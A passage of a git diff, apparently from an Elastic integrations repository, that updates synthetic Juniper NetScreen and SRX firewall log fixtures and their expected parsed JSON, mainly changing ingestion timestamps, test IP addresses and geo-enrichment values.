"message": "tnulapa: NetScreen device_id=madmi [No Name]system-high-00628(adeser): audit log queue Event Log is overwritten (2018-1-27 05:21:06)", "event": { - "ingested": "2021-12-06T12:25:17.286329920Z" + "ingested": "2021-12-10T10:13:47.070654500Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "laboree: NetScreen device_id=udantiu [itametco]system-high-00556(stiaecon): UF-MGR: usBono CPA server port changed to rumexe.", "event": { - "ingested": "2021-12-06T12:25:17.286333748Z" + "ingested": "2021-12-10T10:13:47.070663500Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "nturmag: NetScreen device_id=uredol [maliqua]system-medium-00058(mquia): PIMSM protocol configured on interface eth2266", "event": { - "ingested": "2021-12-06T12:25:17.286336863Z" + "ingested": "2021-12-10T10:13:47.070672600Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "ueporroq: NetScreen device_id=ute [No Name]system-low-00625: Session (id tationu src-ip 10.142.21.251 dst-ip 10.154.16.147 dst port 6881) route is valid. (2018-3-11 02:28:49)", "event": { - "ingested": "2021-12-06T12:25:17.286339829Z" + "ingested": "2021-12-10T10:13:47.070681500Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "adipi: NetScreen device_id=mquis [ratvo]system-low-00042(isno): Replay packet detected on IPSec tunnel on enp0s1170 with tunnel ID nderiti! From 10.105.212.51 to 10.119.53.68/1783, giatqu (2018-3-25 09:31:24)", "event": { - "ingested": "2021-12-06T12:25:17.286342995Z" + "ingested": "2021-12-10T10:13:47.070690400Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "emvel: NetScreen device_id=pta [dolo]system-medium-00057(eacommod): uamqu: static multicast route src=10.174.2.175, grp=aparia input ifp = lo6813 output ifp = enp0s90 added", "event": { - "ingested": "2021-12-06T12:25:17.286346251Z" + "ingested": "2021-12-10T10:13:47.070699600Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "giat: NetScreen device_id=ttenb [eirure]system-high-00549(rem): add-route-\u003e untrust-vr: exer", "event": { - "ingested": "2021-12-06T12:25:17.286349828Z" + "ingested": "2021-12-10T10:13:47.070708500Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "lapari: NetScreen device_id=rcitat [cinge]system-high-00536(luptate): IKE gateway eritqu has been elites. pariat", "event": { - "ingested": "2021-12-06T12:25:17.286353194Z" + "ingested": "2021-12-10T10:13:47.070714900Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "accus: NetScreen device_id=CSed [tiu]system-low-00049(upta): The router-id of virtual router \"asper\" used by OSPF, BGP routing instances id has been uninitialized. (dictasun)", "event": { - "ingested": "2021-12-06T12:25:17.286356380Z" + "ingested": "2021-12-10T10:13:47.070721600Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "itanimi: NetScreen device_id=onoru [data]system-high-00064(eosqui): Can not create track-ip list", "event": { - "ingested": "2021-12-06T12:25:17.286359696Z" + "ingested": "2021-12-10T10:13:47.070737600Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "int: NetScreen device_id=ionevo [llitani]system-high-00541(itametco): The system killed OSPF neighbor because the current router could not see itself in the hello packet. Neighbor changed state from etcons to etco state, (neighbor router-id 1iuntN, ip-address 10.89.179.48). (2018-6-19 03:46:49)", "event": { - "ingested": "2021-12-06T12:25:17.286363002Z" + "ingested": "2021-12-10T10:13:47.070743Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "mmodicon: NetScreen device_id=eetdo [mquisno]system-low-00017(lup): mipsamv From 10.57.108.5:5523 using protocol icmp on interface enp0s4987. The attack occurred 2282 times", "event": { - "ingested": "2021-12-06T12:25:17.286366329Z" + "ingested": "2021-12-10T10:13:47.070748Z" }, "ecs": { "version": "1.12.0" @@ -759,7 +759,7 @@ { "message": "inimve: NetScreen device_id=aea [emipsumd]system-low-00263(ptat): Admin user saq has been accepted via the asiarch server at 10.197.10.110", "event": { - "ingested": "2021-12-06T12:25:17.286369545Z" + "ingested": "2021-12-10T10:13:47.070754700Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "tlab: NetScreen device_id=vel [ionevo]system-high-00622: NHRP : NHRP instance in virtual router ptate is created. (2018-8-1 00:54:32)", "event": { - "ingested": "2021-12-06T12:25:17.286372881Z" + "ingested": "2021-12-10T10:13:47.070764700Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "qui: NetScreen device_id=caboN [imipsam]system-high-00528(catcupid): SSH: Admin user 'ritquiin' at host 10.59.51.171 requested unsupported authentication method texplica", "event": { - "ingested": "2021-12-06T12:25:17.286376167Z" + "ingested": "2021-12-10T10:13:47.070770800Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "udexerci: NetScreen device_id=uae [imveni]system-medium-00071(ptatemse): NSRP: Unit itationu of VSD group setquas nbyCi", "event": { - "ingested": "2021-12-06T12:25:17.286379443Z" + "ingested": "2021-12-10T10:13:47.070777700Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "isno: NetScreen device_id=luptatev [occaeca]system-high-00018(urau): aeca Policy (oNem, itaedict ) was eroi from host 10.80.103.229 by admin fugitsed (2018-9-12 22:02:15)", "event": { - "ingested": "2021-12-06T12:25:17.286382770Z" + "ingested": "2021-12-10T10:13:47.070790200Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "utlabore: NetScreen device_id=edquiano [mSecti]system-high-00207(tDuisaut): RIP database size limit exceeded for uel, RIP route dropped.", "event": { - "ingested": "2021-12-06T12:25:17.286386537Z" + "ingested": "2021-12-10T10:13:47.070797800Z" }, "ecs": { "version": "1.12.0" @@ -831,7 +831,7 @@ { "message": "agn: NetScreen device_id=iqu [quamqua]system-high-00075: NSRP: Unit equeporr of VSD group amremap oremagna", "event": { - "ingested": "2021-12-06T12:25:17.286389833Z" + "ingested": "2021-12-10T10:13:47.070803100Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "ntium: NetScreen device_id=ide [quunturm]system-low-00040(isautem): High watermark for early aging has been changed to the default usan", "event": { - "ingested": "2021-12-06T12:25:17.286392929Z" + "ingested": "2021-12-10T10:13:47.070807500Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "catcu: NetScreen device_id=quame [tionemu]system-low-00524(eursi): SNMP host 10.163.9.35 cannot be removed from community uatDu because failure", "event": { - "ingested": "2021-12-06T12:25:17.286396034Z" + "ingested": "2021-12-10T10:13:47.070812Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "cteturad: NetScreen device_id=modi [No Name]system-low-00625(ecatcu): Session (id ntoccae src-ip 10.51.161.245 dst-ip 10.193.80.21 dst port 5657) route is valid. (2018-11-23 09:15:06)", "event": { - "ingested": "2021-12-06T12:25:17.286399090Z" + "ingested": "2021-12-10T10:13:47.070815900Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "chit: NetScreen device_id=iusmodit [lor]system-high-00524(adeserun): SNMP request has been received, but success", "event": { - "ingested": "2021-12-06T12:25:17.286402166Z" + "ingested": "2021-12-10T10:13:47.070822Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "vento: NetScreen device_id=litsed [ciun]system-medium-00072: The local device inrepr in the Virtual Security Device group lla changed state", "event": { - "ingested": "2021-12-06T12:25:17.286405342Z" + "ingested": "2021-12-10T10:13:47.070827500Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "rissusci: NetScreen device_id=uaturQ [iusmod]system-medium-00533(mips): VIP server 10.41.222.7 is now responding", "event": { - "ingested": "2021-12-06T12:25:17.286408498Z" + "ingested": "2021-12-10T10:13:47.070835Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "upta: NetScreen device_id=ivel [tmollita]system-low-00070(deFinib): NSRP: nsrp control channel change to lo4065", "event": { - "ingested": "2021-12-06T12:25:17.286414780Z" + "ingested": "2021-12-10T10:13:47.070843900Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "ommodic: NetScreen device_id=mmodic [essequam]system-low-00040(nihi): VPN 'xeaco' from 10.134.20.213 is eavolupt (2019-2-2 20:27:57)", "event": { - "ingested": "2021-12-06T12:25:17.286418256Z" + "ingested": "2021-12-10T10:13:47.070852700Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "ptasnul: NetScreen device_id=utaliqui [mcorpor]system-medium-00023(ostru): VIP/load balance server 10.110.144.189 cannot be contacted", "event": { - "ingested": "2021-12-06T12:25:17.286421492Z" + "ingested": "2021-12-10T10:13:47.070861500Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "luptatem: NetScreen device_id=ing [hen]system-medium-00034(umquid): SCS: SCS has been olabo for tasnu with conse existing PKA keys already bound to ruredolo SSH users.", "event": { - "ingested": "2021-12-06T12:25:17.286424869Z" + "ingested": "2021-12-10T10:13:47.070870200Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "iat: NetScreen device_id=orain [equaturQ]system-low-00554: SCAN-MGR: Attempted to load AV pattern file created quia after the AV subscription expired. (Exp: Exce)", "event": { - "ingested": "2021-12-06T12:25:17.286428135Z" + "ingested": "2021-12-10T10:13:47.070878900Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "dese: NetScreen device_id=ptasn [liqui]system-low-00541: ScreenOS invol serial # Loremips: Asset recovery has been cidun", "event": { - "ingested": "2021-12-06T12:25:17.286431331Z" + "ingested": "2021-12-10T10:13:47.070887700Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "ole: NetScreen device_id=odi [tper]system-medium-00628(ectetur): audit log queue Event Log is overwritten (2019-4-15 07:40:49)", "event": { - "ingested": "2021-12-06T12:25:17.286434657Z" + "ingested": "2021-12-10T10:13:47.070896400Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "iadolo: NetScreen device_id=ecatcup [No Name]system-high-00628: audit log queue Traffic Log is overwritten (2019-4-29 14:43:23)", "event": { - "ingested": "2021-12-06T12:25:17.286437793Z" + "ingested": "2021-12-10T10:13:47.070905300Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "qui: NetScreen device_id=iaecon [dminima]system-high-00538(psaquaea): NACN failed to register to Policy Manager eabillo because of success", "event": { - "ingested": "2021-12-06T12:25:17.286440949Z" + "ingested": "2021-12-10T10:13:47.070914100Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "eosqu: NetScreen device_id=reetdolo [umquam]system-low-00075(enderi): The local device labore in the Virtual Security Device group uasiarch changed state from iamquisn to inoperable. (2019-5-28 04:48:31)", "event": { - "ingested": "2021-12-06T12:25:17.286444375Z" + "ingested": "2021-12-10T10:13:47.070923100Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "veleumi: NetScreen device_id=volupt [equ]system-high-00535(ure): SCEP_FAILURE message has been received from the CA", "event": { - "ingested": "2021-12-06T12:25:17.286447982Z" + "ingested": "2021-12-10T10:13:47.070931200Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "reseo: NetScreen device_id=entoreve [rudexer]system-medium-00026(iruredol): IKE iad: Missing heartbeats have exceeded the threshold. All Phase 1 and 2 SAs have been removed", "event": { - "ingested": "2021-12-06T12:25:17.286451018Z" + "ingested": "2021-12-10T10:13:47.070936800Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "ptate: NetScreen device_id=oloreeu [imipsa]system-high-00038: OSPF routing instance in vrouter uame taevitae", "event": { - "ingested": "2021-12-06T12:25:17.286454023Z" + "ingested": "2021-12-10T10:13:47.070942900Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "archi: NetScreen device_id=caboNe [ptate]system-high-00003(ius): Multiple authentication failures have been detected!", "event": { - "ingested": "2021-12-06T12:25:17.286457099Z" + "ingested": "2021-12-10T10:13:47.070952Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "remap: NetScreen device_id=ntium [veniamqu]system-high-00529: DNS entries have been refreshed by HA", "event": { - "ingested": "2021-12-06T12:25:17.286460095Z" + "ingested": "2021-12-10T10:13:47.070960900Z" }, "ecs": { "version": "1.12.0" @@ -1095,7 +1095,7 @@ { "message": "llumdo: NetScreen device_id=tot [itquii]system-high-00625(erspici): Session (id oreeu src-ip 10.126.150.15 dst-ip 10.185.50.112 dst port 7180) route is invalid. (2019-8-21 23:03:57)", "event": { - "ingested": "2021-12-06T12:25:17.286476516Z" + "ingested": "2021-12-10T10:13:47.070969800Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "quepo: NetScreen device_id=tDuisa [iscive]system-medium-00521: Can't connect to E-mail server 10.152.90.59", "event": { - "ingested": "2021-12-06T12:25:17.286483128Z" + "ingested": "2021-12-10T10:13:47.070978700Z" }, "ecs": { "version": "1.12.0" @@ -1119,7 +1119,7 @@ { "message": "lorem: NetScreen device_id=icons [hende]system-low-00077(usBonor): HA link disconnect. Begin to use second path of HA", "event": { - "ingested": "2021-12-06T12:25:17.286487486Z" + "ingested": "2021-12-10T10:13:47.070985400Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "preh: NetScreen device_id=dol [No Name]system-low-00625: Session (id gnamal src-ip 10.119.181.171 dst-ip 10.166.144.66 dst port 3051) route is invalid. (2019-10-3 20:11:40)", "event": { - "ingested": "2021-12-06T12:25:17.286492175Z" + "ingested": "2021-12-10T10:13:47.070991600Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "avolup: NetScreen device_id=litse [archit]system-high-00041(untutlab): A route-map name in virtual router estqu has been removed", "event": { - "ingested": "2021-12-06T12:25:17.286496192Z" + "ingested": "2021-12-10T10:13:47.071000600Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "eddoeiu: NetScreen device_id=consect [eetdolo]system-medium-00038(remipsum): OSPF routing instance in vrouter ons emporin", "event": { - "ingested": "2021-12-06T12:25:17.286499529Z" + "ingested": "2021-12-10T10:13:47.071009500Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "texpl: NetScreen device_id=isquames [No Name]system-low-00021: DIP port-translation stickiness was atio by utla via ntm from host 10.96.165.147 to 10.96.218.99:277 (2019-11-15 17:19:22)", "event": { - "ingested": "2021-12-06T12:25:17.286503707Z" + "ingested": "2021-12-10T10:13:47.071018300Z" }, "ecs": { "version": "1.12.0" @@ -1179,7 +1179,7 @@ { "message": "elaudant: NetScreen device_id=ratvolu [odte]system-medium-00021(eum): DIP port-translation stickiness was uidol by repr via idu from host 10.201.72.59 to 10.230.29.67:7478 (2019-11-30 00:21:57)", "event": { - "ingested": "2021-12-06T12:25:17.286507103Z" + "ingested": "2021-12-10T10:13:47.071027200Z" }, "ecs": { "version": "1.12.0" @@ -1191,7 +1191,7 @@ { "message": "toc: NetScreen device_id=rau [sciuntN]system-low-00602: PIMSM Error in initializing interface state change", "event": { - "ingested": "2021-12-06T12:25:17.286510379Z" + "ingested": "2021-12-10T10:13:47.071035800Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log index 4ef6659737f..b68951f25bd 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log @@ -1,4 +1,4 @@ -<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="89.160.20.112" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"] -<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.0.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"] -<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.0.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"] -<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="1.1.1.1" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"] +<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="67.43.156.14" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"] +<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.168.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"] +<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.168.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"] +<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="67.43.156.15" source-port="60148" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json index d24f1c01b47..85bf03ddb14 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-atp.log-expected.json @@ -3,32 +3,26 @@ { "server": { "port": 80, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 80, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "source": { "port": 57116, @@ -83,7 +77,7 @@ ], "ip": [ "10.10.10.1", - "89.160.20.112" + "67.43.156.14" ] }, "client": { @@ -92,8 +86,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:18.976147371Z", - "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"89.160.20.112\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", + "ingested": "2021-12-10T10:13:49.798358700Z", + "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -127,7 +121,7 @@ "host.example.com" ], "ip": [ - "192.0.2.0" + "192.168.2.0" ] }, "log": { @@ -138,7 +132,7 @@ "name": "admin" }, "domain": "host.example.com", - "ip": "192.0.2.0" + "ip": "192.168.2.0" }, "juniper": { "srx": { @@ -153,8 +147,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:18.976160776Z", - "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.0.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", + "ingested": "2021-12-10T10:13:49.798372100Z", + "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -188,7 +182,7 @@ "host.example.com" ], "ip": [ - "192.0.2.0" + "192.168.2.0" ] }, "log": { @@ -196,7 +190,7 @@ }, "source": { "domain": "host.example.com", - "ip": "192.0.2.0" + "ip": "192.168.2.0" }, "juniper": { "srx": { @@ -214,8 +208,8 @@ }, "event": { "severity": 11, - "ingested": "2021-12-06T12:25:18.976163761Z", - "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.0.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", + "ingested": "2021-12-10T10:13:49.798377Z", + "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", "kind": "alert", "category": [ "network", @@ -244,8 +238,20 @@ "ip": "10.0.0.1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 60148, - "ip": "1.1.1.1", + "ip": "67.43.156.15", "domain": "dummy_host" }, "juniper": { @@ -292,18 +298,18 @@ "dummy_host" ], "ip": [ - "1.1.1.1", + "67.43.156.15", "10.0.0.1" ] }, "client": { "port": 60148, - "ip": "1.1.1.1" + "ip": "67.43.156.15" }, "event": { "severity": 165, - "ingested": "2021-12-06T12:25:18.976166166Z", - "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"1.1.1.1\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", + "ingested": "2021-12-10T10:13:49.798383500Z", + "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log index 5ba1845ff99..aa521a40fa1 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log @@ -1,25 +1,25 @@ -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="89.160.20.112" source-port="56639" destination-address="89.160.20.112" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] -<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="89.160.20.112" source-port="63456" destination-address="89.160.20.112" destination-port="902" service-name="None" 